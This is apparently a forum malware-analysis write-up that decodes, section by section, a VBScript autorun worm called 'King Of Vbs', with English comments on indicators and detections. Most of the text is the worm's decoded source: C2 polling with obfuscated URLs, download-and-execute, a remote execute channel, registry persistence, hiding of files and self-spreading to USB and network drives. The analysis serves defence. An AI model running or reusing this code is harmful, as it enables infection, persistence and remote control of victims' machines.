&chr(&h61)&chr(&h2d)&chr(&h31)&chr(&h33)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h45)&chr(&h6e)&chr(&h64)&chr(&h20)&chr(&h49)&chr(&h66)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h75)&chr(&h63)&chr(&h3d)&chr(&h75)&chr(&h63)&chr(&h2b)&chr(&h63)&chr(&h68)&chr(&h72)&chr(&h28)&chr(&h61)&chr(&h29)&chr(&h22)&chr(&h26)&chr(&h63)&chr(&h26)&chr(&h22)&chr(&h4e)&chr(&h65)&chr(&h78)&chr(&h74)&chr(&h22)&chr(&h29)
再次intercept之:
引用:
' Fully decoded core of uc(): a ROT13 over a-z plus three substitutions that
' restore the line breaks and quotes stripped from the payload strings:
'   125 "}" -> 13 (CR), 123 "{" -> 10 (LF), 124 "|" -> 34 (").
' Defensive use: this is all that is needed to statically decode every
' execute(uc("...")) string in the sample -- nothing has to be run.
c=vbCrLf:Execute("For i=1 To Len(b):a=Asc(Mid(b,i,1))"&c&"If a=125 Then a=13"&c&"If a=123 Then a=10"&c&"if a=124 Then a=34"&c&"if a>96 and a<110 then"&c&"a=a+13"&c&"elseif a>109 and a<123 then"&c&"a=a-13"&c&"End If"&c&"uc=uc+chr(a)"&c&"Next")
4.分段解密decode_1.txt:
第一段:
引用:
' ---- Decoded stage-1 globals. Analyst notes; the first line "'0.1" is the
' sample's own marker and is compared against "'"&ver by the main body. ----
' NOTE(review): every path separator renders as "/" on this page; the original
' sample most likely used "\" -- confirm against the raw file before building
' detections on these strings.
'0.1
ver="0.1"
' Base name of the dropped copies is a single apostrophe: "'.vbs" / "'.vbe".
filename="'"
infname="'.ini"
' tile becomes line 1 of the .ini / autorun.inf and doubles as an
' "already infected by this version" marker.
tile="King Of Vbs"&ver
about="For Word 10.10"
' Two download URLs assembled from chr() to defeat plain string scanning.
' Decode offline and treat as network IoCs; do not browse to them.
fromurl=chr(104)&chr(116)&chr(116)&chr(112)&"://"&chr(85)&"o."&chr(48)&chr(55)&chr(51)&"6c"&chr(100)&chr(46)&chr(110)&"et"&chr(47)&"o"&chr(47)&"v"&chr(54)&chr(46)&chr(65)&chr(115)&chr(80)
fromurl2=chr(104)&chr(116)&chr(116)&chr(112)&"://"&"x1"&chr(50)&chr(52)&chr(46)&chr(55)&"76"&chr(54)&chr(46)&chr(79)&chr(114)&chr(71)&chr(47)&"o"&chr(47)&chr(86)&chr(54)&chr(46)&chr(65)&chr(83)&chr(112)
' From here on every runtime error is silently swallowed.
on error resume next
dim wsh
set wsh = createobject("wscript.shell")
set fso = createobject("scripting.filesystemobject")
' FSO SpecialFolder: 0 = Windows, 1 = System, 2 = Temp.
set dir = fso.getspecialfolder(1)
set win = fso.getspecialfolder(0)
set dc = fso.drives
' Own file name; the script directory is derived below as mulu.
ouwnname=wscript.scriptname
' Downloaded executables are staged in Temp.
exemulu=fso.getspecialfolder(2)&"/"
wbem=fso.getspecialfolder(1)&"/wbem/"
mulu=left(wscript.scriptfullname,len(wscript.scriptfullname)-len(wscript.scriptname))
' sys = "installed" mode: the running copy lives in the System folder.
if mulu=dir&"/" then sys=true
第二段:原文有function头尾标志,先删除再解密
引用:
' gettask: once-per-day C2 poll. Only acts when dir\date.bin does not hold
' today's date (the main body decides on which days date.bin is refreshed).
' Network IoC: GET of a small text task file from fromurl / fromurl2 whose
' first line is the literal "<script>".
function gettask()
if readtxt(dir&"/date.bin",1)<>trim(date) then
js=1
' Up to 4 attempts: tries 1-2 use fromurl, tries 3-4 fall back to fromurl2.
do while check<>"<script>"
if js>2 then
advdownfile mulu&"temp.txt",fromurl2,0,1,100
check=readtxt(mulu&"temp.txt",1)
else
advdownfile mulu&"temp.txt",fromurl,0,1,100
check=readtxt(mulu&"temp.txt",1)
end if
js=js+1
if js>4 then
exit do
end if
loop
if fso.fileexists(mulu&"temp.txt") then
' Task file layout, one value per line: marker, downis, downame, downfrom,
' vbsver, vbsrun, vbsname, vbsfrom, taskis, taskcode, upvbe.
set openfile = fso.opentextfile(mulu&"temp.txt", 1)  
check = openfile.readline
downis = openfile.readline
downame = openfile.readline
downfrom = openfile.readline
vbsver = openfile.readline
vbsrun = openfile.readline
vbsname = openfile.readline
vbsfrom = openfile.readline
taskis = openfile.readline
taskcode = openfile.readline
upvbe= openfile.readline
openfile.close  
fso.deletefile(mulu&"temp.txt")
if check="<script>" then
' Mark today as polled, then rewrite the .ini with C2-supplied values
' (they land on .ini lines 5, 7, 9 and 11 -- see buildinf).
buildfile dir&"/date.bin",date
buildinf downame,taskis,taskcode,upvbe
' Self-update: fetch a replacement script into the System folder and exit.
if vbsver<>ver or not fso.fileexists(dir&"/"&vbsname) then
advdownfile dir&"/"&vbsname,vbsfrom,vbsrun,3,2000
wscript.quit
end if
' Secondary payload: download an executable to Temp and run it (runfile=1).
if downis=1 and sys then
if downame<>lexe or not fso.fileexists(exemulu&lexe) then
delfile exemulu&lexe
advdownfile exemulu&downame,downfrom,1,3,1000
end if
end if
end if
end if
end if
on error resume next
' Remote code execution channel: when .ini line 7 is "1", line 9 is decoded
' with uc() and executed as VBScript. Detection: wscript.exe reading the .ini
' followed by behaviour not present in the static sample.
if sys then
if readtxt(mulu&infname,7)=1 then
execute(uc(readtxt(mulu&infname,9)))
end if
end if
end function
第三段:
引用:
' delfile: removes a file or folder at `where`. Attributes are reset to 0
' first (shuxing) so read-only/hidden/system bits cannot block the delete.
function delfile(where)
if fso.fileexists(where) then
shuxing where,0
fso.deletefile(where)
end if
if fso.folderexists(where) then
shuxing where,0
fso.deletefolder(where)
end if
end function
第四段:
引用:
' buildfile: replaces `where` with a one-line file containing `what`, then
' marks it hidden+system (2+4). Used for date.bin and the wbem .vbe copy.
function buildfile(where,what)
delfile where
set bin = fso.createtextfile(where, true)
bin.writeline what
bin.close
shuxing where,2+4
end function
第五段:
引用:
' buildinf: writes the autorun.inf template (mulu&infname) that ganran later
' copies to drives, and that the script also uses as its own config store.
' Line positions matter, other code reads them with readtxt:
'   1 tile (marker)   5 exever (exe name launched from Temp)
'   7 taskcode ("1" enables the execute channel in gettask)
'   9 tasksw (uc()-encoded VBScript executed by gettask)
'  11 adv (1 = drop wbem copy, 2 = immunize fixed drives; see main body)
' The shell\open label "打开" ("Open") makes the injected context-menu entry
' look like Explorer's default so double-clicking the drive runs the script.
' File is left read-only+hidden+system (1+2+4).
function buildinf(exever,taskcode,tasksw,adv)
delfile mulu&infname
set ini = fso.createtextfile(mulu&infname, true)
ini.writeline tile
ini.writeline "[autorun]"
ini.writeline about
ini.writeline "open=wscript.exe ./"&filename&".vbs"
ini.writeline exever
ini.writeline "shell/open=打开(&o)"
ini.writeline taskcode
ini.writeline "shell/open/command=wscript.exe ./"&filename&".vbs"
ini.writeline tasksw
ini.writeline "shell/open/default=1"
ini.writeline adv
ini.close
shuxing mulu&infname,1+2+4
end function
第六段:
引用:
' readtxt: returns line number `line` (1-based) of the text file `where`, or
' the string "not_found" if the file does not exist. With the global
' "on error resume next", reading past the end presumably leaves strline at
' the last successfully read line -- confirm before relying on it.
function readtxt(where,line)
if fso.fileexists(where) then
set readfile = fso.opentextfile(where, 1)  
i=0
do while i<line
i=i+1
strline = readfile.readline
loop
readfile.close
readtxt=strline
else
readtxt="not_found"
end if
end function
第七段:
引用:
' shuxing ("attributes"): sets the FSO attribute bits of a file or folder.
' Values used by the sample: 0 normal, 1 read-only, 2 hidden, 4 system.
function shuxing(file,change)
if fso.fileexists(file) then
set ofile = fso.getfile(file)
ofile.attributes = change
set ofile = nothing
end if
if fso.folderexists(file) then
set ofile = fso.getfolder(file)
ofile.attributes = change
set ofile = nothing
end if
end function
第八段:
引用:
' advdownfile: HTTP downloader with retries.
'   localfile - destination path; urlfile - URL; runfile - 1 to execute the
'   file afterwards; cishu - max attempts; minsize - minimum byte size to
'   accept (smaller results are deleted and retried after 3 s).
' Uses Microsoft.XMLHTTP for a synchronous GET and ADODB.Stream (type 1 =
' binary, savetofile mode 2 = overwrite) to write the body, then marks the
' file hidden+system. Detection: wscript.exe loading msxml/adodb and writing
' hidden executables to Temp.
' The repeated "'if 1=2 then ..." lines are dead comments, presumably inserted
' to perturb signature matching.
function advdownfile(localfile,urlfile,runfile,cishu,minsize)
test=0
do while test<cishu
shuxing localfile,0
ilocal = lcase(localfile):iremote = lcase(urlfile):
'if 1=2 then wscript.echo "impossible!"
set xpost = createobject("microsoft.xmlhttp")  
'if 1=2 then wscript.echo "impossible!"
xpost.open "get",iremote,0
'if 1=2 then wscript.echo "impossible!"
on error resume next
xpost.send()
' er() is true if send() raised; the retry branch below handles that case.
if not er then
'if 1=2 then wscript.echo "impossible!"
set sget = createobject("adodb.stream")
'if 1=2 then wscript.echo "impossible!"
sget.mode = 3
'if 1=2 then wscript.echo "impossible!"
sget.type = 1  
'if 1=2 then wscript.echo "impossible!"
sget.open()  
'if 1=2 then wscript.echo "impossible!"
sget.write(xpost.responsebody)  
'if 1=2 then wscript.echo "impossible!"
sget.savetofile ilocal,2
'if 1=2 then wscript.echo "impossible!"
shuxing localfile,2+4
if fso.fileexists(localfile) then
filesize=fso.getfile(localfile).size
else
filesize=0
end if
' Accept only if larger than minsize (guards against error pages / stubs).
if filesize>minsize then
if runfile=1 then wsh.run localfile
exit do
end if
else
test=test+1
delfile localfile
wscript.sleep 3000
end if
loop
end function
第九段:没有加密
引用:
' er: true if an error is pending (and clears it), false otherwise. Lets the
' sample branch on failures under "on error resume next" without aborting.
function er()
if err.number = 0 then
er = false
else
err.clear
er = true
end if
end function
第十段:即解密函数本身
引用:
' uc with the analyst's hook: the decoded body from section 3, with
' ":intercept(uc)" appended so the decoded text is handed to Intercept, which
' writes it to decode_1.txt and quits. Because Intercept quits the host, each
' run captures only the first execute(uc(...)) reached -- hence the
' segment-by-segment approach below.
' The doubled spaces ("If  a=125") are presumably page-rendering artifacts.
function uc(b)
c=vbCrLf:Execute("For i=1 To Len(b):a=Asc(Mid(b,i,1))"&c&"If  a=125 Then a=13"&c&"If a=123 Then a=10"&c&"if a=124 Then  a=34"&c&"if a>96 and a<110 then"&c&"a=a+13"&c&"elseif a>109  and a<123 then"&c&"a=a-13"&c&"End  If"&c&"uc=uc+chr(a)"&c&"Next"):intercept(uc):end function
第十一段:没有加密
引用:
' ucc: ignores `b`, shows a message box and returns Empty. Used by the main
' body as the content for the wbem .vbe copy -- apparently a stub.
function ucc(b)
msgbox("holle hacker")
end function
第十二段:
引用:
' ---- Main body (decoded). Runs after the function definitions. ----
' Flow: emulate the Explorer window the user expected, mutual exclusion,
' self-integrity check, then either (sys) maintain persistence and infect
' drives, or (not sys) install into the System/Windows folders and hand over
' to the installed copy.
for each d in dc
' Launched from a drive root (autorun): open that drive in Explorer
' (window style 3 = maximized, no wait) so nothing looks unusual.
if mulu=d&"/" then opendisk=wsh.run("explorer "&d,3,false)
next
if not sys then
wscript.sleep 5000
' jincheng returns 1 when WMI failed, True when >= 2 wscript.exe are running.
' Quit if already polled today (WMI unavailable) or another instance exists.
if jincheng("wscript.exe",2)=1 and readtxt(dir&"/date.bin",1)= trim(date) then wscript.quit
if jincheng("wscript.exe",2)<>1 and jincheng("wscript.exe",2) then wscript.quit
end if
' Tamper check: own first line must equal "'"&ver (the leading '0.1 comment);
' otherwise chengfa() shows a message box, deletes this file and quits.
if readtxt(mulu&ouwnname,1)<>"'"&ver then
chengfa
end if
if sys then
' Installed mode (running from the System folder).
yincang
' Ensure the .ini template exists and carries this version in line 1.
if readtxt(mulu&infname,1)<>tile then
buildinf ver,0,0,0
end if
' .ini line 5 names a secondary executable staged in Temp; launch if present.
lexe=readtxt(mulu&infname,5)
if fso.fileexists(exemulu&lexe) then
wsh.run exemulu&lexe
end if
' Persistence: hidden+system .vbe copies in the System and Windows folders,
' registered via zhuce (HKLM ...\policies\Explorer\run). Detection: RegWrite
' to that key from wscript.exe; new .vbe files under %SystemRoot%.
if readtxt(dir&"/"&filename&".vbe",1)<>"'"&ver then
copyvbs dir&"/"&filename&".vbe"
zhuce
end if
if readtxt(win&"/"&filename&".vbe",1)<>"'"&ver then
copyvbs win&"/"&filename&".vbe"
end if
' .ini line 11 = 1: drop a copy under System\wbem. ucc() ignores its argument
' and only shows a message box, and O1/O2 are defined nowhere on this page,
' so the written content is presumably empty -- looks unfinished.
if readtxt(wbem&filename&".vbe",1)<>"'"&ver and readtxt(mulu&infname,11)=1 then
buildfile wbem&filename&".vbe",ucc(O1+O2)
end if
' .ini line 11 = 2: on fixed drives (FSO DriveType 2) replace any autorun.inf
' *file* with a read-only+hidden+system *folder* of that name -- an autorun
' "immunization" that keeps competing droppers out.
if readtxt(mulu&infname,11)=2 then
for each d in dc
if d.drivetype = 2 then
if fso.fileexists(d&"/autorun.inf") then
delfile d&"/autorun.inf"
end if
if not fso.folderexists(d&"/autorun.inf") then
buildfold d&"/autorun.inf"
shuxing d&"/autorun.inf",1+2+4
end if
end if
next
end if
' AV fingerprinting via WMI process names (avp.exe / kwatch.exe / ccenter.exe
' -- likely Kaspersky, Kingsoft and Rising). The class only selects a schedule.
if jincheng("avp.exe",1) then
k=1
elseif jincheng("kwatch.exe",1) then
k=2
elseif jincheng("ccenter.exe",1) then
k=3
else
k=4
end if
' date.bin is stamped "already polled today" on every day except the one
' matching the AV class, so gettask() contacts the C2 only on those days.
t = day(date) mod 3
if (k=1 and t=1) or (k=2 and t=2) or (k=3 and t=2) or (k=4 and t=0) then
else
buildfile dir&"/date.bin",date
end if

' ganran() loops forever; the relaunch below is reached only if it returns.
ganran
wsh.run mulu&ouwnname
else
' Not installed (e.g. started from a removable drive): hide self, copy to the
' System and Windows folders as .vbe, register persistence, start that copy.
shuxing mulu&ouwnname,2+4
copyvbs dir&"/"&filename&".vbe"
copyvbs win&"/"&filename&".vbe"
zhuce
wsh.run dir&"/"&filename&".vbe"
end if
第十三段:
引用:
' jincheng ("process"): counts Win32_Process rows whose Name equals `where`
' via WMI. The counter starts at 1, so the result is True when at least
' `geshu` matching processes exist; Empty (falsy) otherwise; and 1 when the
' WMI query itself failed (er). Note: `where` is concatenated into the WQL
' string unescaped -- harmless for the fixed names the sample passes.
function jincheng(where,geshu)
on error resume next
set y=getobject("winmgmts://./root/cimv2")
set x=y.execquery("select * from win32_process where name='"&where&"'")
i=1
for each j in x   
i=i+1
next
if not er then
if i>geshu then jincheng = true
else
jincheng = 1
end if
end function
第十四段:好几个函数没加密,归在一起
引用:
' copyfile: deletes the destination (clearing its attributes via delfile),
' then copies `file` over it with overwrite=true.
function copyfile(file,where)
delfile where
if fso.fileexists(file) then
fso.copyfile file,where,true
end if
end function

' copyvbs: self-replication. Reads this script's own source (mulu&ouwnname),
' writes it to `where`, then sets hidden+system (2+4).
' Detection: wscript.exe writing hidden+system .vbe files under %SystemRoot%.
function copyvbs(where)
delfile where
set self=fso.opentextfile(mulu&ouwnname,1)
vbscopy=self.readall
self.close
set vbs = fso.createtextfile(where, true)
vbs.write vbscopy
vbs.close
shuxing where,2+4
end function

' zhuce ("register"): persistence via the policy-controlled autostart key
' HKLM\...\CurrentVersion\policies\Explorer\run, value "explorer" = "'.vbe"
' (relative name, resolved against the System folder where copyvbs placed it).
' Detection: RegWrite to this key by a scripting host.
' NOTE(review): "Curren tVersion" and the "/" separators are presumably
' page-rendering artifacts; verify against the raw sample.
function zhuce()
RegPath="HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/Curren tVersion/policies/Explorer/run/"
Type_Name="REG_SZ"
Key_Name="explorer"
Key_Data=filename&".vbe"
Wsh.RegWrite RegPath&Key_Name,Key_Data,Type_Name
end function

' yincang ("hide"): sets HKCU\...\Explorer\Advanced\ShowSuperHidden = 0 so
' Explorer hides protected OS files, keeping the hidden+system drops out of
' sight. Mitigation: restore the setting; alert on writes to it by wscript.exe.
' NOTE(review): "Current Version" and the "/" separators are presumably
' page-rendering artifacts; verify against the raw sample.
function yincang()
RegPath="HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced/"
Type_Name="REG_DWORD"
Key_Name="ShowSuperHidden"
Key_Data="00000000"
Wsh.RegWrite RegPath&Key_Name,Key_Data,Type_Name
end function

' buildfold: recursive mkdir -- creates missing parents first, then `path`.
' The main body uses it to create a folder named autorun.inf on fixed drives
' so no autorun.inf file can be placed there by other droppers.
function buildfold(path)
if fso.folderexists(path) then
exit function
end if
if not fso.folderexists(fso.getparentfoldername(path)) then
buildfold fso.getparentfoldername(path)
end if
fso.createfolder(path)
end function
第十五段:
引用:
' NOTE(review): listing error in the write-up -- the header is dowork's but
' the body is byte-for-byte jincheng's (segment 13): it references `where`
' and `geshu`, which are not dowork's parameters, and assigns `jincheng`.
' The real dowork follows as segment 16; treat this segment as a duplicate.
function dowork(pcs,fname,furl,time)
on error resume next
set y=getobject("winmgmts://./root/cimv2")
set x=y.execquery("select * from win32_process where name='"&where&"'")
i=1
for each j in x   
i=i+1
next
if not er then
if i>geshu then jincheng = true
else
jincheng = 1
end if
end function
第十六段:
引用:
' dowork: download-and-run helper. If Temp\fname is absent and at least one
' process named `pcs` is running, fetch it from http://furl (2 attempts, min
' 3000 bytes). If present: when time<>0, set the system clock back to 2002
' through "%comspec% /c date" (hidden window) and wait |time| seconds --
' presumably to defeat a time/expiry check in the payload; run it; when
' time>0, restore the saved date after 5 s. Returns 1 once the file was run.
' No caller is visible on this page; it could be reached via the .ini line 9
' execute channel. Detection: cmd.exe spawned by wscript.exe running "date".
function dowork(pcs,fname,furl,time)
if not fso.fileexists(exemulu&fname) and jincheng(pcs,1) then
advdownfile exemulu&fname,"http://"&furl,0,2,3000
end if
if fso.fileexists(exemulu&fname) then
if time<>0 then
nowdate=date
wsh.run "%comspec% /c date 2002-"&month(date)&"-"&day(date),vbhide
wscript.sleep abs(time*1000)
end if
wsh.run exemulu&fname
dowork=1
if time>0 then
wscript.sleep 5000
wsh.run "%comspec% /c date "&nowdate,vbhide
end if
end if
end function
第十七段:
引用:
' ganran ("infect"): never returns. Every 3 s, for each network drive
' (FSO DriveType 3) or removable drive (type 1, excluding A: and B:):
' remove any immunizing autorun.inf folder, then make sure the drive root
' holds the .ini template as autorun.inf and the Windows-folder .vbe copy as
' "'.vbs"; copies are refreshed when autorun.inf line 1 is not this version's
' marker. On every even minute gettask() polls the C2 (rw is never set on this
' page, so Empty<>-1 is presumably always true).
' Detection: autorun.inf + hidden .vbs appearing on removable media / shares.
function ganran()
do
for each d in dc
if d.drivetype = 3 or (d.drivetype = 1 and d<>"A:" and d<> "B:") then
if fso.folderexists(d&"/autorun.inf") then
delfile d&"/autorun.inf"
end if
if fso.fileexists(d&"/"&filename&".vbs") and fso.fileexists(d&"/autorun.inf") then
if readtxt(d&"/autorun.inf",1)<>tile then
copyfile dir&"/"&infname,d&"/autorun.inf"
copyfile win&"/"&filename&".vbe",d&"/"&filename&".vbs"
end if
else
yincang
copyfile dir&"/"&infname,d&"/autorun.inf"
copyfile win&"/"&filename&".vbe",d&"/"&filename&".vbs"
end if
end if
next
if (minute(now) mod 2)=0 and rw<>-1 then 
gettask
end if
wscript.sleep 3000
loop
end function
第十八段:
引用:
' chengfa ("punish"): anti-tamper response reached when the script's own
' first line no longer matches "'"&ver -- shows a message box, deletes the
' running copy and exits.
function chengfa()
msgbox("hello,hacker!")
delfile mulu&ouwnname
wscript.quit
end function